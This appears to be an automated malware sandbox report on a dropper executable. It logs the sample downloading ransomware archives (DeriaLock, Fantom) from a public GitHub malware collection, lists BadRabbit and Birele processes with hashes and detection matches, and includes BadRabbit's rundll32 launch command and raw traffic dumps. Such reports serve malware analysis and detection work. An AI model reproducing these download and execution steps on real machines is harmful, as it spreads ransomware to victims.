                                                                                                                                                                                      2022-09-29 12:50:02 UTC563INData Raw: de 4d 9a 8e 59 8d c1 b2 14 3d 9e 92 ed fd 47 2d fd da 4d 94 db 7e a0 48 9f d2 9d 29 e3 eb 4b 25 0c 57 b4 5f df e1 22 87 ce 6e a3 71 92 1e 54 d6 f9 d6 31 90 1f cc fb de c0 90 07 33 cb e9 b3 99 ee f4 13 00 15 d5 ec 65 4c 16 4e a3 54 30 bd fa 6c d2 ae 0e c1 3c 03 ec 80 d5 cd bf 1a ad 79 6a b2 65 c7 9f 66 a7 be de 44 74 24 72 96 4d 81 6f 1d e6 88 58 fc 8e 20 98 11 1d 18 27 6e 72 bd b5 c5 8d f9 81 fb cf d0 3b 24 06 f3 f8 b2 62 19 8d 5c 37 72 e6 b0 9c e7 8e 4e 3a a3 5b 19 ce e1 aa f3 29 29 22 3f 15 96 8f 77 c4 1e e4 40 7c 89 7e fb dd d5 94 bc aa 30 db 1c 55 67 62 f2 27 fe e4 ef 3a b5 16 8c 6c 23 80 eb 1c 0a 4f db 11 de a6 06 ac f4 02 85 38 ea f0 a8 49 06 1f d0 43 b4 ad 60 d6 b5 b7 f4 60 ec 4c 3a 0e cd de aa 3b c5 61 e4 70 d5 f8 fd c8 b5 0b 0c e7 38 0c d1 c5 59
                                                                                                                                                                                      Data Ascii: MY=G-M~H)K%W_"nqT13eLNT0l<yjefDt$rMoX 'nr;$b\7rN:[))"?w@|~0Ugb':l#O8IC``L:;ap8Y
                                                                                                                                                                                      2022-09-29 12:50:02 UTC579INData Raw: 58 c4 6f c1 18 0b 51 41 9c 3a 4f 19 2a ec fa 4c 17 70 3f 35 09 86 db 43 3b b7 8b 78 47 45 08 2b 85 af 10 69 71 d9 c9 a8 5c 74 1d e9 d1 e2 40 9a dc 7c f3 a8 39 63 5b d7 fd d9 8c 65 b3 ae ac e1 64 5b 74 b5 6d 6d 95 92 5b 29 a1 fd 20 5b 6c 52 5a 7c ec dd 0b ec 7b 5c b6 2b 77 5d 1c a0 36 51 5e 9c 2b 99 13 88 2c 1a 91 ab 63 37 63 bd 67 17 79 03 e8 84 d8 66 a6 ab e6 f3 f5 f4 db b5 13 ec 04 9e d9 36 32 f7 95 d5 23 37 57 cc 6b ff d6 ac ae 18 28 d5 b9 b0 1e 55 4a 21 ea 71 72 4a 60 a3 97 5a cd 39 62 39 a1 9e 4e e8 18 54 0d 30 07 0c 78 5d 8f 1d 2c 10 7d c1 40 f7 86 6b eb 81 4b b2 15 a9 db 17 51 db e6 5f cc a3 d1 53 73 df ef 66 3a 8b f2 b7 8e 58 e1 5c 30 79 f6 a4 48 9b 75 e4 16 63 c3 fa 3a 7d 63 e5 fe 76 1e f5 f3 01 c1 db be 5b 16 81 cc 39 9c f5 f7 8c 17 e5 15 95 20
                                                                                                                                                                                      Data Ascii: XoQA:O*Lp?5C;xGE+iq\t@|9c[ed[tmm[) [lRZ|{\+w]6Q^+,c7cgyf62#7Wk(UJ!qrJ`Z9b9NT0x],}@kKQ_Ssf:X\0yHuc:}cv[9
                                                                                                                                                                                      2022-09-29 12:50:02 UTC595INData Raw: 5f 28 3f af a5 64 40 57 d9 b8 38 76 91 c4 d6 20 fa 25 cf f4 be 17 05 26 a0 33 f3 a9 44 55 c1 99 e6 9e c9 2d ca d1 54 9c 5d 1d a8 d9 d6 a6 69 a4 ef e5 ab d6 42 f7 75 0d 40 a8 63 19 69 e8 ea b1 cb 42 18 0a 75 af 82 bb dd 1b 6f 16 28 75 2b c8 eb e9 c8 22 bd 37 4e b2 64 92 77 b2 a1 2d 16 fb 0a 15 c2 13 7b 29 ce 8d 22 19 3a b9 60 b1 5c 59 9d 40 37 a4 14 2c cf 2a 4b 8b 4a da bc fe 04 d9 cc 13 34 98 11 36 55 7e 17 6e 0d 9b ef d5 67 f9 f8 6b d5 e3 16 58 f1 3c 66 d8 72 70 0b 7e 75 24 e6 57 44 a9 58 97 89 87 e2 a8 ff e6 6d d4 78 dd 71 74 63 b6 cc 7c 6f 38 64 e2 71 c6 22 83 6c 49 04 6d a0 39 bd d6 22 60 89 7f b4 48 17 dd f6 43 45 61 63 5f e1 87 d9 6b 36 fa 45 73 70 bc 07 6d 0f 3d 19 6b bb 13 a8 b2 76 d6 c7 6c 99 20 94 fe 13 2f c1 53 f8 9f 8a 3a 89 cc dc 8a d2 86 60
                                                                                                                                                                                      Data Ascii: _(?d@W8v %&3DU-T]iBu@ciBuo(u+"7Ndw-{)":`\Y@7,*KJ46U~ngkX<frp~u$WDXmxqtc|o8dq"lIm9"`HCEac_k6Espm=kvl /S:`
                                                                                                                                                                                      2022-09-29 12:50:02 UTC611INData Raw: 1d d7 0a b2 c6 c3 92 13 28 91 87 a6 d3 70 1c 21 99 0f 71 f5 03 51 b8 b3 6b 81 ae 2d c7 cb a3 54 65 e2 d0 8e 42 a5 12 86 45 34 29 74 e9 1c b0 57 ef 08 b5 ba 9d d3 2f a2 a2 d3 eb 1d 5a 73 b5 4a 55 41 58 50 a8 4c 04 78 74 98 6e 47 5d 33 33 1c 07 59 57 7f ff fd 3b b5 c4 ee f8 bb 6f 59 61 7c 8a d8 6c ac 6d d7 78 81 25 6c 1b 15 ef e7 20 bc 8e ac b2 c9 86 b9 f9 e6 ae f3 82 fb 9e a8 78 10 81 8d 36 44 10 5a 78 a3 dd f7 e3 63 78 7b cf 04 c2 5b 97 72 0f ad 73 a7 b7 cd 33 97 3f c8 8f dc c9 c8 3d 0a ed 1d f9 d0 04 78 38 7e 76 34 04 28 57 7a 37 4e ef b6 77 2d 02 8c 04 b6 c6 d4 49 0c ef 5c 46 54 c9 e2 bc 1d e4 97 5d ba f6 3a 9f 22 fb f8 b1 7e bb 77 71 ae 2e c0 b2 0a 3d f3 d6 1f c4 48 a9 95 b5 ce cd 62 b3 53 80 90 a4 cd 43 13 22 d9 f7 7e 1a cd c2 4c 42 72 8d 15 c7 c6 9a
                                                                                                                                                                                      Data Ascii: (p!qQk-TeBE4)tW/ZsJUAXPLxtnG]33YW;oYa|lmx%l x6DZxcx{[rs3?=x8~v4(Wz7Nw-I\FT]:"~wq.=HbSC"~LBr
                                                                                                                                                                                      2022-09-29 12:50:02 UTC627INData Raw: 64 8d 3f 83 70 c0 19 4e e9 8a 25 64 79 61 85 c9 06 7f e9 fd 75 50 b2 da 53 a6 2f f5 54 68 94 9d 1a 32 72 87 ba 30 03 35 10 aa fd 92 dc ad de 6b 0d fb b4 7d af 47 c3 21 14 ca 78 d4 7d 13 58 87 73 7f 70 b0 71 59 1b 71 51 6a 1e db f5 95 76 59 1f f5 8a 59 cf f2 95 3f bb 0a 82 f8 ea e5 d1 dc 7e 45 dd 14 c9 a4 87 e2 4d c8 c2 5a 58 5c b2 bd d4 0d d7 b2 73 7e 5c 1c 5f 05 83 69 78 74 dc a2 64 a4 6b a3 0d 09 ac 78 4e 65 de 49 d5 79 9a 75 98 17 7e 73 b5 d2 52 51 c8 4f 14 13 33 09 30 bb 2c 02 06 06 b4 b5 6e 69 17 4d a5 4f d7 c1 19 6c f9 b4 f0 e0 49 ab a8 31 26 fb 20 31 aa 14 0e 6d 86 03 ab 72 9f 95 e9 99 75 07 03 1c 7f 7e ff ca f6 6c d4 52 2a e0 b0 99 7e 86 d3 38 e6 74 ba 0b 34 e3 f4 60 c1 91 73 fb d7 2c 90 d3 97 c8 f7 94 04 3d f5 e8 89 cf ea 88 8e 19 b5 5b 03 69 5a
                                                                                                                                                                                      Data Ascii: d?pN%dyauPS/Th2r05k}G!x}XspqYqQjvYY?~EMZX\s~\_ixtdkxNeIyu~sRQO30,niMOlI1& 1mru~lR*~8t4`s,=[iZ
                                                                                                                                                                                      2022-09-29 12:50:02 UTC643INData Raw: 8d c0 e7 26 91 fb 60 0b bf f1 6f 26 ab b5 57 3c 89 fd e3 fb dc f6 e2 f5 80 df 70 2e 75 42 75 f5 42 17 31 63 fe 91 be 3e 43 19 0a d1 2e 3d 65 16 45 60 bf b9 29 5e 93 48 d0 9d 1f 1b c5 bf ae ff fa 2f 23 32 d0 15 95 d8 d0 c9 f9 fb ff 22 c0 63 d3 6e 25 d0 ce b3 cf 2a a6 41 dd bf 67 65 46 31 e5 6b ea 95 c7 12 4f 9e 62 0f cf 8c be 61 d8 25 7c a8 0d 93 47 10 79 c5 02 98 56 7e c0 d9 37 70 27 83 be df 6e a2 0f 52 33 a1 fe c1 1e 59 bb 7d fa 58 4f 3e 9b c9 72 d7 f2 31 30 24 55 60 bc 93 62 6d e6 b0 b7 63 af 5b 61 e9 c0 7d 35 9c 95 03 3b 83 f3 97 d9 4e 0d 31 9c be fa e0 0d f1 5d 79 06 4c c1 26 22 1f 30 7b b0 49 7d 24 c5 91 b1 18 64 aa d5 38 d3 57 9c cc 7a ac 5e c9 99 b7 84 a6 d4 a5 42 40 1e 74 55 b9 f0 52 3a af 91 d3 ef 64 1f 81 e0 33 57 03 6c 8a 3e 71 88 9a a5 17 e7
                                                                                                                                                                                      Data Ascii: &`o&W<p.uBuB1c>C.=eE`)^H/#2"cn%*AgeF1kOba%|GyV~7p'nR3Y}XO>r10$U`bmc[a}5;N1]yL&"0{I}$d8Wz^B@tUR:d3Wl>q
                                                                                                                                                                                      2022-09-29 12:50:02 UTC659INData Raw: cd 32 fa 4e 2b ba 92 94 af f3 89 63 24 ba 3d bc 6b 40 0d dd 62 98 28 1e 1d c2 3b 03 ca 75 4c bf 88 13 44 90 ca c7 97 b3 2a 6d 34 e6 35 1c a6 63 59 1a 30 87 f9 89 8b 66 b1 71 7d b8 bf df 03 83 ff c7 96 e9 15 3c e8 78 0b 6a 9a 04 25 fe a4 36 72 08 4a ac bb ed a9 20 30 bf 96 84 4b df 43 92 87 8c 5a c5 ac 75 38 13 12 88 52 a8 22 35 dd 61 9a 30 24 ef a4 1c 72 ca 5f 5e cf 7f cf 47 b1 9b 5d 47 38 4c 4d 12 3c 07 9d 49 ca 97 b9 b4 c6 e9 fe 6c 48 f3 0f 9c 77 99 be 9c f1 42 77 24 33 cc 2c f0 b0 fa b2 86 f1 02 fe 0c 79 74 cc 33 72 5f c7 1a 96 ac 23 c8 f3 ca ef 09 4f 97 48 ad b6 c1 3b 5d 6c 2e 07 4e f0 b3 7c 36 a0 08 c4 93 41 be 0e 46 a3 06 b9 59 f2 d7 cf f5 e7 c4 44 db ed 1f 47 6d f0 79 3a a3 d1 ff dc 08 bc 10 91 b3 80 ef 50 bd 3e aa 68 ed f6 f6 7d 1f ff 1d 23 ca 3c
                                                                                                                                                                                      Data Ascii: 2N+c$=k@b(;uLD*m45cY0fq}<xj%6rJ 0KCZu8R"5a0$r_^G]G8LM<IlHwBw$3,yt3r_#OH;]l.N|6AFYDGmy:P>h}#<
                                                                                                                                                                                      2022-09-29 12:50:02 UTC675INData Raw: 17 e7 83 c6 83 6e e7 f0 70 82 cc 29 37 25 bf ea 1e 92 96 71 3d 3d 09 44 93 c2 44 82 d3 e9 94 3e 1d d4 73 92 d0 36 bf 37 83 74 8b b9 e5 48 25 a2 5f 07 ee 20 59 95 c9 f8 f9 ae 80 87 4f 77 7d ba 63 f0 22 12 0e 4f 47 04 c0 9c fb da 46 22 91 d1 35 c1 35 85 20 bb 31 29 d2 02 a9 52 33 25 9d 27 b0 2b 26 c3 48 3a ec cf 4a f1 3b 07 61 3c 7f 6d 66 44 57 19 ee 23 91 15 e0 12 c1 c6 f9 28 1b 8a 52 95 4f 84 ac 2b 56 6f 2d b3 a0 bc 36 61 6b 74 c3 f4 0a dd 4c b0 36 3f c6 0a ad 83 e3 0d dd c3 ba aa d8 0e df f1 81 b7 27 07 ec 07 3c 87 d2 f5 c3 61 02 6e 43 07 5a 4f 79 e7 0f 9d b7 0a 6c 7a 0e c8 67 a5 b2 10 b2 d8 8c ab 2b 18 f1 40 1c 34 0b b0 12 97 d8 ed a0 d7 57 d1 29 b9 e0 ab ff 5f 23 6f df 30 c7 03 57 0f 01 4f eb 3a 45 0f 4a 8a 4b d6 60 b4 80 3d 2f e2 ac b1 8d 15 32 bb ab
                                                                                                                                                                                      Data Ascii: np)7%q==DD>s67tH%_ YOw}c"OGF"55 1)R3%'+&H:J;a<mfDW#(RO+Vo-6aktL6?'<anCZOylzg+@4W)_#o0WO:EJK`=/2
                                                                                                                                                                                      2022-09-29 12:50:02 UTC691INData Raw: e9 71 77 e9 c7 3d c7 de cc a6 2f 83 4e 91 9d eb 03 12 ab 98 95 4e 57 57 b3 e4 51 0f 22 a7 22 23 da cf f5 b2 d9 e8 69 b3 7a a1 34 a4 ae 7b 5e 8a e1 b1 60 c7 c1 bb 1f b3 46 38 3c d1 0d 94 2b 89 da 10 74 f9 3f a2 37 26 9b e7 b8 4a 5f 72 a2 d3 52 50 64 ca c0 a4 38 05 74 c6 4e 9c 89 6d 7a 9d 5c db 34 0b 05 c2 f0 5e 80 9e 1e 0d ff 65 8c 41 80 57 0e 9e 47 08 0e 04 bc ef 64 42 bd 9d db d7 58 9a 0f d2 00 e5 cf 4d 6d 73 ea 09 76 37 b4 1f bd ea b3 9b 60 96 4b c6 9e 64 d2 5a e5 67 da 26 88 20 b5 af 00 4c 16 69 a0 8c b8 f3 53 d2 74 9a 0b 7e 96 77 89 c8 6f 67 f3 f6 41 99 62 35 89 dc 1b 2b d7 4b 8c 7d 31 f7 18 44 20 61 73 74 16 5f ae 3e bd 68 11 44 9e 7c 92 37 be 6e bf e4 15 3f bd 55 7d 30 34 cd 75 f8 1c 50 ee 2b 1f 69 5f bd 63 17 8e 2a 64 4a 90 8e cb b9 77 fb c9 5e ef
                                                                                                                                                                                      Data Ascii: qw=/NNWWQ""#iz4{^`F8<+t?7&J_rRPd8tNmz\4^eAWGdBXMmsv7`KdZg& LiSt~wogAb5+K}1D ast_>hD|7n?U}04uP+i_c*dJw^


                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                      6 | 192.168.2.6 | 49725 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                      2022-09-29 12:50:08 UTC | 698 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                                                      Host: github.com
                                                                                                                                                                                      2022-09-29 12:50:08 UTC | 698 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:48:33 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                                                      2022-09-29 12:50:08 UTC | 698 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                      7 | 192.168.2.6 | 49726 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                      2022-09-29 12:50:08 UTC | 700 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      2022-09-29 12:50:09 UTC | 700 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 215551
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "ee00430e92951d5ab964c364741ca65eb7489f27da783a2e2ec395efcca6982a"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 0813:121E:2686D8:32DEE8:6335931B
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:50:09 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6957-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455809.899003,VS0,VE210
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: 13718146793df7587da1c949e0570fb92e1f1587
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:55:09 GMT
                                                                                                                                                                                      Source-Age: 0


                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                      8 | 192.168.2.6 | 49744 | 140.82.121.4 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                      2022-09-29 12:50:14 UTC | 911 | OUT | GET /Endermanch/MalwareDatabase/raw/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                                                      Host: github.com
                                                                                                                                                                                      2022-09-29 12:50:15 UTC | 912 | IN | HTTP/1.1 302 Found
                                                                                                                                                                                      Server: GitHub.com
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                                                                      Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                                                      Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                                                      Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip
                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                      Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                      Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                                                      2022-09-29 12:50:15 UTC | 912 | IN | Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                                                                                                      9 | 192.168.2.6 | 49745 | 185.199.108.133 | 443 | C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                                                                                                                                      2022-09-29 12:50:15 UTC | 914 | OUT | GET /Endermanch/MalwareDatabase/master/ransomwares/Fantom.zip HTTP/1.1
                                                                                                                                                                                      Host: raw.githubusercontent.com
                                                                                                                                                                                      2022-09-29 12:50:15 UTC | 914 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                      Connection: close
                                                                                                                                                                                      Content-Length: 203087
                                                                                                                                                                                      Cache-Control: max-age=300
                                                                                                                                                                                      Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                                      Content-Type: application/zip
                                                                                                                                                                                      ETag: "0f6cd0c854741d82e79b6fae3ecfc41f9b92740bab354e2ee252955917725cf0"
                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                      X-Frame-Options: deny
                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                      X-GitHub-Request-Id: 0846:E4BC:5E09CA:68A9EF:63359324
                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                      Date: Thu, 29 Sep 2022 12:50:15 GMT
                                                                                                                                                                                      Via: 1.1 varnish
                                                                                                                                                                                      X-Served-By: cache-mxp6942-MXP
                                                                                                                                                                                      X-Cache: HIT
                                                                                                                                                                                      X-Cache-Hits: 1
                                                                                                                                                                                      X-Timer: S1664455815.166676,VS0,VE213
                                                                                                                                                                                      Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                      X-Fastly-Request-ID: 0866938ac275de01134e6fcadebb7c343f3e7dc3
                                                                                                                                                                                      Expires: Thu, 29 Sep 2022 12:55:15 GMT
                                                                                                                                                                                      Source-Age: 0



                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                      Start time:14:49:41
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\Desktop\irH9zMhZub.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\irH9zMhZub.exe"
                                                                                                                                                                                      Imagebase:0x201cefd0000
                                                                                                                                                                                      File size:152576 bytes
                                                                                                                                                                                      MD5 hash:7D8F0E539E50EB545D094C50AAB0EA9E
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                      Start time:14:49:53
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
                                                                                                                                                                                      Imagebase:0x1320000
                                                                                                                                                                                      File size:441899 bytes
                                                                                                                                                                                      MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: BadRabbit_Gen, Description: Detects BadRabbit Ransomware, Source: C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe, Author: Florian Roth
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 93%, ReversingLabs
                                                                                                                                                                                      • Detection: 83%, Metadefender, Browse
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                      Start time:14:49:54
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                      Start time:14:49:54
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                      • Rule: sig_8ebc97e05c8e1073bda2efb6f4d00ad7e789260afa2c276f0c72740b838a0a93, Description: Bad Rabbit Ransomware, Source: 00000003.00000003.300635883.00000000041D1000.00000004.00000800.00020000.00000000.sdmp, Author: Christiaan Beek
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                      Start time:14:49:55
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@BadRabbit.exe"
                                                                                                                                                                                      Imagebase:0x1320000
                                                                                                                                                                                      File size:441899 bytes
                                                                                                                                                                                      MD5 hash:FBBDC39AF1139AEBBA4DA004475E8839
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                      Start time:14:49:59
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                      Imagebase:0x7ff603c50000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                      Start time:14:49:59
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                                                                                      Imagebase:0x7ff603c50000
                                                                                                                                                                                      File size:51288 bytes
                                                                                                                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                      Has elevated privileges:false
                                                                                                                                                                                      Has administrator privileges:false
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                      Start time:14:50:00
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      Imagebase:0x7ff6da640000
                                                                                                                                                                                      File size:625664 bytes
                                                                                                                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                      Reputation:high

                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                      Start time:14:50:00
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\Endermanch@Birele.exe"
                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                      File size:119296 bytes
                                                                                                                                                                                      MD5 hash:41789C704A0EECFDD0048B4B4193E752
                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                      • Detection: 86%, ReversingLabs
                                                                                                                                                                                      • Detection: 78%, Metadefender, Browse
                                                                                                                                                                                      Reputation:low

                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                      Start time:14:50:01
                                                                                                                                                                                      Start date:29/09/2022
                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                      Commandline:C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
                                                                                                                                                                                      Imagebase:0x850000
                                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                                      Has elevated privileges:true
